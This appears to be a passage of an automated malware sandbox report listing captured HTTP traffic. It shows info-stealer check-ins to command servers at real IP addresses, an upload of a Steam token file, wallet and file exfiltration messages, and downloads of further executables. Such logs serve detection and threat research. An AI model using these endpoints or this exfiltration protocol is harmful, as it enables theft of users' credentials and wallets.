Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD Host: 85.28.47.31 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------BGCAAFHIEBKJKEBFIEHD Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------BGCAAFHIEBKJKEBFIEHD Content-Disposition: form-data; name="message" wallets ------BGCAAFHIEBKJKEBFIEHD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFHCAEGCBFHJDGCBFHDA Host: 85.28.47.31 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------KFHCAEGCBFHJDGCBFHDA Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------KFHCAEGCBFHJDGCBFHDA Content-Disposition: form-data; name="message" ybncbhylepme ------KFHCAEGCBFHJDGCBFHDA--
Source: global traffic HTTP traffic detected: GET /soka/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/enter.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIEC Host: 85.28.47.31 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Ascii: ------GIECFIEGDBKJKFIDHIEC Content-Disposition: form-data; name="token" bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130 ------GIECFIEGDBKJKFIDHIEC Content-Disposition: form-data; name="file_name" c3RlYW1fdG9rZW5zLnR4dA== ------GIECFIEGDBKJKFIDHIEC Content-Disposition: form-data; name="file" ------GIECFIEGDBKJKFIDHIEC--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKKECAFBFHJDGDHIEHJDHost: 85.28.47.31Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 45 43 41 46 42 46 48 4a 44 47 44 48 49 45 48 4a 44 2d 2d 0d 0a Data Ascii: ------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------AKKECAFBFHJDGDHIEHJDContent-Disposition: form-data; name="message"files------AKKECAFBFHJDGDHIEHJD--
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJHost: 85.28.47.31Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 2d 2d 0d 0a Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="message"wkkjqaiaxkhb------FHDAFIIDAKJDGDHIDAKJ--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: GET /inc/PharmaciesDetection.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 35 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000025001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/buildred.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFCGIIIJDBGCBGIDGIHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 43 47 49 49 49 4a 44 42 47 43 42 47 49 44 47 49 2d 2d 0d 0a Data Ascii: ------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GDBFCGIIIJDBGCBGIDGIContent-Disposition: form-data; name="build"sila------GDBFCGIIIJDBGCBGIDGI--
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000027001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic HTTP traffic detected: GET /inc/build2.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 32 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000028001&unit=246122658369
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 32 32 46 37 33 42 39 35 43 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB22F73B95C82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 36 34 35 43 33 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A645C3FEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
